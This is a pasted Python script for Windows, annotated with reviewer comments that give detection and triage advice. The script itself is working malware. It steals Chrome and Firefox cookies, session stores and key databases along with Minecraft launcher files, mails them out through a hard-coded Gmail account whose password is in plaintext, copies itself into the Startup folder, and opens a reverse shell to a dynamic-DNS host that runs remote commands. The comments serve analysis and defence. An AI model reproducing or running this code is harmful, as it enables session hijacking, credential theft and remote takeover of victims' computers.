
Untitled

a guest
Jun 20th, 2018
  1. import socket
  2. import os
  3. import subprocess
  4. import shutil
  5. import time
  6. import getpass
  7.  
  8. from getpass import getuser
  9. from smtplib import SMTP_SSL
  10. from os import listdir
  11. from os.path import getsize
  12. from os.path import basename
  13. from email.mime.text import MIMEText
  14. from email.mime.base import MIMEBase
  15. from email import encoders
  16. from email.mime.image import MIMEImage
  17. from email.mime.multipart import MIMEMultipart
  18.  
  # NOTE(review): a mail account name and its password are embedded in
  # plaintext. Both are passed to snatcher()/snatcherFile() later in the
  # listing, which log in to smtp.gmail.com with them and mail files to
  # this same address. For triage, these two literals are static
  # indicators that can be searched for in other samples.
  19. username="perf3ctodst@gmail.com"
  20. password="F4nt4sy7sungs4Mpi312"
  21.  
  # The logged-in account name is read twice: USER_NAME is formatted into
  # the Startup-folder paths, diruser into the C:/Users/... profile paths.
  22. USER_NAME=getpass.getuser()
  23. diruser=getuser()
  24. # #AutoStartup Malwario
  # Directory that holds this script, plus the listing of that directory;
  # add_to_startup() iterates src_files and copies each entry.
  25. src = os.path.dirname(os.path.realpath(__file__))
  26. src_files = os.listdir(src)
  27.  
  28. def snatcher(username,password,directory,body):
  # Mails the contents of `directory` to the account given in `username`.
  #   username, password: credentials used for the SMTP login; the address
  #     is also used as both sender and recipient.
  #   directory: path prefix; each name returned by listdir() is appended
  #     to it by string concatenation, so it must end with a separator.
  #   body: plain-text message body.
  # Nothing is returned; the outcome is only printed.
  # NOTE(review): the paste has lost its indentation, so the exact nesting
  # of the try/except blocks below cannot be confirmed from this listing.
  # Detection: the subject line is a fixed string, and the transfer is an
  # outbound TLS session to smtp.gmail.com:465 from a process that is not a
  # mail client. Blocking direct SMTP egress from workstations stops it.
  29. user=username
  30. passwd=password
  31. subject = 'BrowserSessionReport'
  32. msg = MIMEMultipart()
  33. msg['From'] = user
  34. msg['To'] = user
  35. msg['Subject'] = subject
  36. msg.attach(MIMEText(body,'plain'))
  # Every directory entry is read in full and attached base64-encoded.
  37. for file in listdir(directory):
  38. try:
  39. attachment = open(directory+str(file),'rb')
  40. print(str(file)+" is size:"+str(getsize(directory+str(file))))
  41. part = MIMEBase('application','octet-stream')
  42. part.set_payload((attachment).read())
  43. encoders.encode_base64(part)
  44. part.add_header('Content-Disposition',"attachment; filename= "+file)
  45. msg.attach(part)
  46. except PermissionError as e:
  47. print(e)
  # `text` is assigned here but sendmail() below serialises msg again.
  48. text = msg.as_string()
  49. try:
  50. serv=SMTP_SSL('smtp.gmail.com',465)
  51. serv.ehlo()
  52. serv.login(user,passwd)
  53. serv.sendmail(user,user,msg.as_string())
  54. print("Sent!")
  # Bare except: any failure is reduced to a generic console message.
  55. except:
  56. print("Something went wrong")
  57.  
  58. def snatcherFile(username,password,directory,body):
  # Single-file variant of snatcher(): despite its name, `directory` is the
  # full path of one file, which is read, base64-encoded and mailed to the
  # account in `username` (used as both sender and recipient).
  #   username, password: credentials for the SMTP login.
  #   body: plain-text message body.
  # Nothing is returned; the outcome is only printed.
  # NOTE(review): indentation is missing from the paste, so the nesting of
  # the try/except blocks cannot be confirmed from this listing.
  # Detection: the fixed subject string below and an outbound TLS session
  # to smtp.gmail.com:465 from a process that is not a mail client.
  59. user=username
  60. passwd=password
  61. subject = 'BrowserSessionHijackReport'
  62. msg = MIMEMultipart()
  63. msg['From'] = user
  64. msg['To'] = user
  65. msg['Subject'] = subject
  66. msg.attach(MIMEText(body,'plain'))
  67. try:
  68. attachment = open(directory,'rb')
  # The attachment is named after the last path component only.
  69. filename=basename(directory)
  70. part = MIMEBase('application','octet-stream')
  71. part.set_payload((attachment).read())
  72. encoders.encode_base64(part)
  73. part.add_header('Content-Disposition',"attachment; filename= "+filename)
  74. msg.attach(part)
  75. except PermissionError as e:
  76. print(e)
  # `text` is assigned here but sendmail() below serialises msg again.
  77. text = msg.as_string()
  78. try:
  79. serv=SMTP_SSL('smtp.gmail.com',465)
  80. serv.ehlo()
  81. serv.login(user,passwd)
  82. serv.sendmail(user,user,msg.as_string())
  83. print("Sent!")
  # Bare except: any failure is reduced to a generic console message.
  84. except:
  85. print("Something went wrong")
  86.  
  87. def add_to_startup(file_path=""):
  # Persistence step: copies every entry found next to this script into the
  # current user's Startup folder. This is the Startup-folder technique
  # catalogued as MITRE ATT&CK T1547.001.
  #   file_path: accepted but never read in this function.
  # Reads the module-level names USER_NAME, src and src_files.
  # NOTE(review): indentation is missing from the paste, so the nesting of
  # the try/except blocks cannot be confirmed from this listing.
  # Detection: new files or directories appearing under
  # ...\Start Menu\Programs\Startup written by a non-installer process.
  # Auditing file creation in that folder covers this step.
  # bat_path is assigned but not used again; copy_path holds the same value.
  88. bat_path = r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % USER_NAME
  89. x=0
  90. for filename in src_files:
  91. if os.path.exists(os.path.join(str(src),str(filename))):
  92. try:
  93. full_file_name = os.path.join(str(src),str(filename))
  94. copy_path=r"C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" % USER_NAME
  # A plain file copy is tried first; when it raises, the entry is copied
  # as a directory tree into a sub-folder of the Startup folder.
  95. try:
  96. shutil.copy(full_file_name,copy_path)
  97. except:
  98. try:
  99. shutil.copytree(full_file_name,copy_path+"\\"+str(filename))
  100. x+=1
  101. except:
  102. break
  103. except:
  104. pass
  # Collection stage, run once at start-up. Each group is wrapped in a bare
  # try/except that discards every error, so nothing is reported locally.
  # For incident response, the paths below list exactly what left the host.
  # The labels passed as message bodies describe them as launcher and
  # browser session data, so sessions and passwords stored in these
  # profiles should be treated as exposed and revoked or rotated.
  # Detection: reads of these browser profile files by any process other
  # than the browser itself.
  # Group 1: every entry directly under the .minecraft directory.
  105. try:
  106. snatcher(username,password,("C:/Users/"+str(diruser)+"/AppData/Roaming/.minecraft/"),"Minecraft launcher session")
  107. except:
  108. pass
  # Group 2: Chrome Default profile, the Local Storage leveldb directory
  # and the Cookies database.
  109. try:
  110. snatcher(username,password,"C:/Users/"+str(diruser)+"/AppData/Local/Google/Chrome/User Data/Default/Local Storage/leveldb/","Chrome local app storage")
  111. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Local/Google/Chrome/User Data/Default/Cookies","Chrome cookies")
  112. except:
  113. pass
  # Group 3: Firefox. Only the first profile directory returned by
  # listdir() (extra[0]) is used; five files are sent from it.
  114. try:
  115. #I choose not to
  116. extra=os.listdir("C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/")
  117. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/webappsstore.sqlite","Firefox local app storage")
  118. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/storage.sqlite","Firefox storage")
  119. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/cookies.sqlite","Firefox cookies")
  120. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/sessionstore.jsonlz4","Firefox sess storage")
  121. snatcherFile(username,password,"C:/Users/"+str(diruser)+"/AppData/Roaming/Mozilla/Firefox/Profiles/"+str(extra[0])+"/key4.db","Firefox keys storage")
  122. except:
  123. pass
  124. #Only works on windows boxes so far. need one for other chrome pieces of garbage.
  # Persistence is installed after collection; failures are ignored as well.
  125. try:
  126. add_to_startup()
  127. except:
  128. pass
  # Remote-control stage: the script connects out to a hard-coded hostname
  # and port and executes whatever it receives.
  # NOTE(review): indentation is missing from the paste, so which statements
  # belong to which loop or branch cannot be confirmed from this listing.
  # Detection: an outbound TCP connection to port 9365 on the name resolved
  # below, a DNS lookup for that name, and a Python or packaged process
  # spawning shell children. The socket is a plain socket.socket() with no
  # TLS wrapper visible, so commands and output cross the network in clear
  # text and can be inspected in a packet capture.
  129. #Create socket
  130. #add_to_startup()
  131. s=socket.socket()
  132. host=socket.gethostbyname("bastardo219.ddns.net")
  133. port=9365
  134.  
  135. while True:
  136. try:
  137. s.connect((host,port))
  138. except TimeoutError:
  139. continue
  140. while True:
  141. try:
  # Up to 1024 bytes are read per command.
  142. data=s.recv(1024)
  # "cd" prefix: change the working directory to the text after it.
  143. if data[:2].decode('utf-8')=="cd":
  144. os.chdir(data[3:].decode('utf-8'))
  # "kys" prefix: self-removal. Deletes client.exe from the Startup folder,
  # closes the socket and exits. The file name suggests the script is
  # deployed as a packaged client.exe; presumably, confirm against a sample.
  145. if data[:3].decode('utf-8')=="kys":
  146. try:
  147. deletion="C:/Users/%s/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/client.exe" % USER_NAME
  148. os.remove(deletion)
  149. except Exception as e:
  150. s.send(str.encode(output_string+str(os.getcwd())+str(e)))
  151. s.close()
  152. quit()
  153.  
  # Any non-empty payload is handed to the system shell (shell=True); stdout
  # and stderr are sent back, followed by the working directory as a prompt.
  154. if len(data) > 0:
  155. cmd = subprocess.Popen(data[:].decode('utf-8'), shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  156. output_bytes=cmd.stdout.read() + cmd.stderr.read()
  157. output_string=str(output_bytes,'utf-8')
  158. s.send(str.encode(output_string+str(os.getcwd())+"> "))
  # On any error a notice is sent and the script sleeps 30 seconds; if that
  # send fails too, a new socket is created and the hostname is resolved again.
  159. except:
  160. try:
  161. s.send(str.encode("Something bad happened!"))
  162. time.sleep(30)
  163. except:
  164. try:
  165. s=socket.socket()
  166. host=socket.gethostbyname("bastardo219.ddns.net")
  167. s.connect((host,port))
  168. except TimeoutError:
  169. pass
  170.  
  171. #Close connection
  172. s.close()